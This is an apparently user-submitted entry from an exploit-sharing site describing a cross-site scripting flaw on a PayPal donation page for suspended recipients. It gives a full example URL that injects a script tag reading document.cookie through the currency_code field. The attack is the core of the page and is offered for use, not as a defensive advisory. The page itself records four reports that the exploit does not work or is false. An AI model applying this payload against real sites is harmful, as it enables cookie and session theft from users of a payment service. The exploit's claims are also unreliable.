Exploit Name: Paypal Suspended User XSS
Author: e_D
Versions Affected:
All paypal users
Exploit Details:
A cross site scripting exploit exists in the paypal donation page where a user is suspended. If the email address of the account you are donating to has the following message on the donation page:

"This recipient is currently unable to receive money."

You can exploit this flaw by replacing the currency value in the donation form with a "> followed by any html you wish to execute.

An Example:
https://www.paypal.com/xclick/business=unsakred_2k@yahoo.com&item_name=ed&item_number=1&amount=30.00&no_note=1&tax=0&currency_code=USD"><script>alert(document.cookie); </script>

This exploit has had 4 invalid reports. This is the number of times others have reported this exploit as not working or being false in certain details.

If the above is not an exploit or the information provided is false please enter the text you see in the image below:

Please type the text you see above in the box below. This is here for security purposes.

  Main  

  News  

  Our Services  

  Add Exploit  

  Articles  

  Community Forum  

  About  

  Contact  

4477 hits